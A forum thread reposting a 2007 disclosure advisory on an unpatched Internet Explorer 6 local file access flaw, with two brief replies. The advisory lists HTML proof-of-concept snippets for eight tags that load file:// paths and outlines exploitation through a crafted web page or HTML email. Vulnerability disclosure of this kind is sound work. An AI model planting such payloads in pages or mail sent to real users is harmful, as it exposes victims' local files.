opennms
+ Reply to Thread
Results 1 to 3 of 3

Thread: Microsoft Internet Explorer Local File Accesses Vulnerability

  1. #1
    Join Date
    Aug 2006
    Posts
    5

    Microsoft Internet Explorer Local File Accesses Vulnerability

    Microsoft Internet Explorer Local File Accesses Vulnerability

    ############################################################ #########

    XDisclose Advisory : XD*000**
    Vulnerability Discovered : February *0th 07
    Advisory Released : February 20th 07
    ****** : Rajesh Sethumadhavan

    Class : Local File Accesses
    Solution Status : Unpatched
    Vendor : Microsoft Corporation
    Affected applications : Microsoft Internet Explorer
    Affected version : Microsoft Internet Explorer 6
    (Other versions may be also affected)
    Affected Platform : Windows XP Professional SP0,SP*,SP2
    Windows Home Edition SP0,SP*,SP2
    Windows 200*
    ############################################################ #########


    Overview:
    Microsoft Internet Explorer is a default browser bundled with all
    versions of Microsoft Windows operating system.

    Description:
    A vulnerability has been identified in Microsoft Internet Explorer, (default installation) in windows XP service pack 2 which could be exploited by malicious users to obtain victims local files. This flaw is due to an error in the way Microsoft Internet explorer handles different html tags. Which could be exploited by a malicious remote user to obtain sensitive local files from the victim's computer.

    Vulnerability Insight :
    Microsoft Windows explorer is not handling various html tags like "img" "script" "embed" "object" "param" "style" "bgsound" "body" "input" (Other tags may be also vulnerable). By using the file protocol along with above tags it is possible to accesses victims local files.

    a) Embed Tag Local file Accesses:
    ------------------------------------------------------------ ---------
    <EMBED SRC="file:///C:/test.pdf" HEIGHT=600 WIDTH=*440></EMBED>
    ------------------------------------------------------------ ---------

    b) Object & Param Tag Local File Accesses:
    ------------------------------------------------------------ ---------
    <object type="audio/x-mid" data=" file:///C:/test.mid" width="200"
    height="20">
    <param name="src" value="file:///C:/test.mid">
    <param name="autoStart" value="true">
    <param name="autoStart" value="0">
    </object>
    ------------------------------------------------------------ ---------

    c) Body Tag Local File Accesses:
    ------------------------------------------------------------ ---------
    <body background="file:///C:/test.gif" onload="alert('loading body
    bgrd success')" onerror="alert('loading body bgrd error')">
    ------------------------------------------------------------ ---------

    d) Style Tag Local File Accesses:
    ------------------------------------------------------------ ---------
    <STYLE type="text/css">BODY{background:url(" file:///C:/test.gif")}
    </STYLE>
    ------------------------------------------------------------ ---------

    e) Bgsound Tag Local File Accesses:
    ------------------------------------------------------------ ---------
    <bgsound src="file:///C:/test.mid" id="soundeffect" loop=* autostart=
    "true"/>
    ------------------------------------------------------------ ---------

    f) Input Tag Local File Accesses:
    ------------------------------------------------------------ ---------
    <form>
    <input type="image" src=" file:///C:/test.gif" onload="alert('loading
    input success')" onerror="alert('loading input error')">
    </form>
    ------------------------------------------------------------ ---------

    g) Image Tag Local File Accesses:
    ------------------------------------------------------------ ---------
    <img src="file:///C:/test.jpg" onload="alert('loading image success')"
    onerror="alert('loading image error')">
    ------------------------------------------------------------ ---------

    h) Script Tag Local File Accesses:
    ------------------------------------------------------------ ---------
    <script src="file:///C:/test.js"></script >
    ------------------------------------------------------------ ---------


    Exploitation method:
    - Creates a web page or an HTML Mail with the vulnerable code
    - When the victim opens the mail or visit the vulnerable site it is possible to accesses his local files.

    Demonstration:
    Note: Demonstration will try to accesses few default images and wave files

    - Visit the POC
    - If vulnerable internet explorer is used it will show your local
    sample images and give a proper alert.

    Solution:
    No solution

    Screenshot:
    [url]http://www.xdisclose.com/images/xdiscloselocalie.jpg[/url]

    Proof Of Concept:
    [url]http://www.xdisclose.com/poc/xdiscloselocalie.html[/url]

    Impact:
    A Remote user can get accesses to victims local system files.

    Scope of impact is limited to system level.

    Original Advisory:
    [url]http://www.xdisclose.com/XD*000**.txt[/url]

    ******s:
    Rajesh Sethumadhavan has been ******ed with the discovery of this vulnerability

    Disclaimer:
    This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your testing environment only. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

  2. #2
    DevilsAdvance Guest
    Another IE Exploit... What's your point?
    As long as it remains the vast majority web browser it will always be targeted and exploits exploited...

  3. #3
    Join Date
    Sep 2006
    Posts
    1,649
    Which is why us computer enthusiasts/hackers/whatever we wanna call ourselves use FireFox...
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

+ Reply to Thread

Similar Threads

  1. internet explorer problem
    By trafikcsorgul in forum General discussion
    Replies: 4
    Last Post: 08-31-2011, 10:46 AM
  2. Unpatched Internet Explorer 7 expliot
    By Scofield_SS in forum Internet Privacy
    Replies: 10
    Last Post: 02-21-2009, 09:07 AM
  3. Microsoft Internet Explorer source code
    By Joe-X in forum Programming
    Replies: 1
    Last Post: 06-26-2008, 04:09 PM
  4. Internet Explorer 7 - U?
    By SyntaXmasteR in forum Internet Privacy
    Replies: 3
    Last Post: 03-01-2006, 10:30 AM
  5. Need help with internet explorer error
    By franck_888 in forum Internet Privacy
    Replies: 0
    Last Post: 11-17-2005, 10:33 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts